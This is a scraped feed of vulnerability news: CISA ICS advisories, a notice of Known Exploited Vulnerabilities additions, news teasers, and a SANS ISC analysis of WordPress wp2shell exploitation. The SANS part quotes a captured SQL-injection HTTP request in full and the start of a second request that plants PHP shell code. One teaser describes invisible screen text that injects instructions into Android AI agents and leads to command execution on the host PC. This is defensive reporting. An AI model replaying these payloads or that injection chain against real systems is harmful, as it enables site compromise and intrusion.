Deployed: /strong Worldwide /li li strong Company Headquarters Location: /strong Germany /li /ul hr h2 Vulnerabilities /h2 div class="csaf-accordion" p a class="csaf-accordion-toggle-all" href="#" Expand All + /a /p div class="csaf-accordion-item" h3 a class="csaf-accordion-toggle" href="#" CVE-2022-23303 /a /h3 div class="csaf-accordion-content" p The implementations of SAE in hostapd before 2.10 and wpa_supplicant before 2.10 are vulnerable to side channel attacks as a result of cache access patterns. NOTE: this issue exists because of an incomplete fix for CVE-2019-9494. /p p a href="https://www.cve.org/CVERecord?id=CVE-2022-23303" View CVE Details /a /p hr h4 Affected Products /h4 h5 Siemens SIDIS Secured SmartPlug /h5 div class="ics-vendor-version-status" div class="ics-vendor" strong Vendor: /strong br Siemens /div div class="ics-version" strong Product Version: /strong br SIDIS Secured SmartPlug lt; V7.26.0310 /div div class="ics-status" strong Product Status: /strong br known_affected /div /div div class="ics-remediations" h6 Remediations /h6 p strong Vendor fix /strong br Update to V7.26.0310 or later version /p /div p strong Relevant CWE: /strong a href="https://cwe.mitre.org/data/definitions/924.html" CWE-924 Improper Enforcement of Message Integrity During Transmission in a Communication Channel /a /p hr h4 Metrics /h4 div class="csaf-table csaf-metrics-table" table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap thead tr th role="co

VulnerabilityCISA·7d ago
Tycon Systems TPDIN-Monitor-WEB2

p a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-202-01.json" strong View CSAF /strong /a /p h2 Summary /h2 p strong Successful exploitation of these vulnerabilities could result in an attacker accessing sensitive credentials, disrupting connected infrastructure, or manipulating physical equipment, which could present a physical safety risk. /strong /p p The following versions of Tycon Systems TPDIN-Monitor-WEB2 are affected: /p ul li TPDIN-Monitor-WEB2 2.3.9 nbsp; /li /ul div class="csaf-table" table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap thead tr th role="columnheader" data-tablesaw-priority="persist" CVSS /th th role="columnheader" Vendor /th th role="columnheader" Equipment /th th role="columnheader" Vulnerabilities /th /tr /thead tbody tr td v3 9.8 /td td Tycon Systems /td td Tycon Systems TPDIN-Monitor-WEB2 /td td Authentication Bypass Using an Alternate Path or Channel, Cleartext Storage of Sensitive Information /td /tr /tbody /table /div h3 Background /h3 ul li strong Critical Infrastructure Sectors: /strong Critical Manufacturing /li li strong Countries/Areas Deployed: /strong Worldwide /li li strong Company Headquarters Location: /strong United States /li /ul hr h2 Vulnerabilities /h2 div class="csaf-accordion" p a class="csaf-accordion-toggle-all" href="#" Expand All + /a /p div class="csaf-accordion-item" h3 a class="csaf-accordion-toggle" href="#" CVE-2026-61884 /a /h3 div class="csaf-accordion-content" p The web management interface of the affected device does not perform server-side validation of credentials during the login process. By submitting empty values for both credential fields, an unauthenticated remote attacker can bypass the authentication check and establish a valid administrative session. This grants full access to device controls including power relay management, device reboot, remote access service configuration, and network settings, which could allow an attacker to disrupt connected infrastructure or cause physical damage to equipment. /p p a href="https://www.cve.org/CVERecord?id=CVE-2026-61884" View CVE Details /a /p hr h4 Affected Products /h4 h5 Tycon Systems TPDIN-Monitor-WEB2 /h5 div class="ics-vendor-version-status" div class="ics-vendor" strong Vendor: /strong br Tycon Systems /div div class="ics-version" strong Product Version: /strong br Tycon Systems TPDIN-Monitor-WEB2: 2.3.9 /div div class="ics-status" strong Product Status: /strong br known_affected /div /div div class="ics-remediations" h6 Remediations /h6 p strong Vendor fix /strong br Tycon Systems did not respond to CISA's attempts at coordination. Users of Tycon Systems TPDIN-Monitor-WEB2 are encouraged to contact Tycon Systems and keep their systems up to date. br a href="https://www.tyconsystems.com/contact" https://www.tyconsystems.com/contact /a /p /div p strong Relevant CWE: /strong a href="https://cwe.mitre.org/data/definitions/288.html" CWE-288 Authentication

VulnerabilityCISA·7d ago
CISA Adds Four Known Exploited Vulnerabilities to Catalog

p CISA has added four new vulnerabilities to its a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" Known Exploited Vulnerabilities (KEV) Catalog /a , based on evidence of active exploitation. /p ul li a href="https://www.cve.org/CVERecord?id=CVE-2021-27137" target="_blank" CVE-2021-27137 /a DD-WRT Stack-Based Buffer Overflow Vulnerability /li li a href="https://www.cve.org/CVERecord?id=CVE-2026-0770" target="_blank" CVE-2026-0770 /a Langflow Inclusion of Functionality from Untrusted Control Sphere Vulnerability nbsp; /li li a href="https://www.cve.org/CVERecord?id=CVE-2026-63030" target="_blank" CVE-2026-63030 /a WordPress Core Interpretation Conflict Vulnerability nbsp; /li li a href="https://www.cve.org/CVERecord?id=CVE-2026-60137" target="_blank" CVE-2026-60137 /a WordPress Core SQL Injection Vulnerability /li /ul p These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. /p p a href="https://www.cisa.gov/news-events/directives/bod-26-04-implementation-guidance-prioritizing-security-updates-based-risk" Binding Operational Directive (BOD) 26-04: Prioritizing Security Updates Based on Risk /a establishes vulnerability management requirements for Federal Civilian Executive Branch (FCEB) agencies. BOD 26-04 reinforces the importance of the KEV Catalog and requires federal agencies to prioritize rapid remediation of high-risk vulnerabilities, specifically those identified by Common Vulnerabilities and Exposures (CVEs) listed in CISA’s KEV Catalog on publicly exposed assets that grant total control of the asset post-exploitation, while deferring action for lower-risk vulnerabilities. BOD 26-04 further establishes basic expectations for when agencies must check whether threat actors compromised the system before the patch was applied. /p p While BOD 26-04 applies only to FCEB agencies, CISA encourages all organizations to adopt risk-based vulnerability management and prioritize remediation of a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" KEV Catalog vulnerabilities /a . CISA will continue to add vulnerabilities to the catalog that meet the a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog/reducing-significant-risk-known-exploited-vulnerabilities" specified criteria /a . /p p Aware of an exploited vulnerability not currently listed in the KEV Catalog? Submit it for potential addition through CISA’s a href="https://cisasurvey.gov1.qualtrics.com/jfe/form/SV_1Zwu52kgK2OYf3w" target="_blank" KEV Nomination Form /a . Potential KEV additions must have a CVE ID, evidence of exploitation, and clear mitigation guidance. nbsp; /p

VulnerabilityThe Hacker News·7d ago
Open-Source Android AI Agents Could Let Invisible Screen Text Run Code on Host PCs

An Android app that can draw over other windows and write to shared storage can slip instructions to the AI agent driving that phone, in text no human eye will ever see. Two more steps, and the same app is running commands on the PC driving the agent. Researchers demonstrated that chain, plus six other attacks, against five open-source mobile agent frameworks: AppAgent, AppAgentX,

VulnerabilityThe Hacker News·7d ago
New Bit2Watt Attack Could Let Cloud Tenants Disrupt Power Grids Without an Exploit

A cloud tenant using nothing but ordinary GPU access can push a data center's power draw up and down fast enough to threaten the grid it runs on, with no exploit and no break-in. That is the claim behind Bit2Watt, described by three Zhejiang University researchers in a paper accepted to CHES 2026, the IACR's hardware-security conference, and the evidence splits in two: they measured the power

VulnerabilityThe Hacker News·7d ago
WordPress wp2shell Exploitation Grows as Public Exploit Fuels Mass Scanning

Attackers have begun to exploit two critical vulnerabilities in WordPress that, when combined together, enable unauthenticated remote code execution (RCE) and complete compromise of vulnerable websites. The two security flaws, tracked as CVE-2026-63030 and CVE-2026-60137, have been codenamed wp2shell. "By the early hours of Saturday morning (UTC), successful exploitation was already well

VulnerabilitySANS ISC·7d ago
WordPress Exploitation Underway (CVE-2026-63030), (Mon, Jul 20th)

Last week, Searchlight Cyber released details about a vulnerability they are calling wp2shell . The vulnerability was initially announced without a CVE number. But now has been assigned CVE-2026-63030. Many WordPress plugin vulnerabilities are never assigned CVE numbers. But wp2shell is different. It is a SQL injection vulnerability in WordPress Core, not a plugin, and can lead to unauthenticated remote code execution. Shortly after being announced, the vulnerability started to be exploited. If you are running WordPress, stop reading now. Check if you are vulnerable at https://wp2shell.com . Assume compromise if you are vulnerable. The exploit attempts hitting our honeypots are designed to detect the vulnerability, and do not deliver a functional exploit. But one of our readers submitted a complete exploit request captured by SecurityOnion: POST /?rest_route=/batch/v1 HTTP/1.1 Accept-Encoding: identity Content-Length: 735 Host: [hostname redacted]:8888 Content-Type: application/json User-Agent: cve-2026-63030/1.0 Connection: close { requests : [{ method : POST , path : /// }, { method : POST , path : /wp/v2/posts , body : { requests : [{ method : POST , path : /// }, { method : GET , path : /wp/v2/posts/999999?author_exclude=0%29+UNION+SELECT+999999%2C2%2C0x323032302d30312d30312030303a30303a3030%2C0x323032302d30312d30312030303a30303a3030%2C5%2CCONCAT%280x7c7c%2CHEX%28CAST%28%28SELECT+0x4f4b%29AS+CHAR%29%29%2C0x7c7c%29%2C7%2C0x7075626c697368%2C9%2C10%2C11%2C12%2C13%2C14%2C0x323032302d30312d30312030303a30303a3030%2C0x323032302d30312d30312030303a30303a3030%2C17%2C18%2C19%2C20%2C0x706f7374%2C22%2C23--+- orderby=none per_page=500 }, { method : GET , path : /wp/v2/posts }]}}, { method : POST , path : /batch/v1 , body : { requests : []}}]} The vulnerability is exploited via the REST API, and in order to be exploitable, a WordPress install must expose the API. The exploit follows standard SQL injection patterns. It uses a UNION request to execute a second SELECT statement. The second SELECT query decodes to: SELECT 999999,2,0x323032302d30312d30312030303a30303a3030,0x323032302d30312d30312030303a30303a3030,5,CONCAT(0x7c7c,HEX(CAST((SELECT 0x4f4b)AS CHAR)),0x7c7c),7,0x7075626c697368,9,10,11,12,13,14,0x323032302d30312d30312030303a30303a3030,0x323032302d30312d30312030303a30303a3030,17,18,19,20,0x706f7374,22,23 Decoding the HEX part: SELECT 999999,2,'2020-01-01 00:00:00', ' 2020-01-01 00:00:00', 5, '||OK||', 7, 'publish', 9,10,11,12,13,14,'2020-01-01 00:00:00','2020-01-01 00:00:00',17,18,19,20,'post',22,23 This is a query to determine whether the system is vulnerable to SQL injection. The next query delivers the actual exploit: { requests :[{ method : POST , path : /// },{ body :{ requests :[{ method : POST , path : /// },{ method : GET , path : /wp/v2/posts/999999?author_exclude=0%29+UNION+SELECT+%27%3C%3Fphp+error_reporting%280%29%3B%40ini_set%28%5C%27display_errors%5C%27%2C0%29%3B%24k%3D%2294uh9ubh6e1x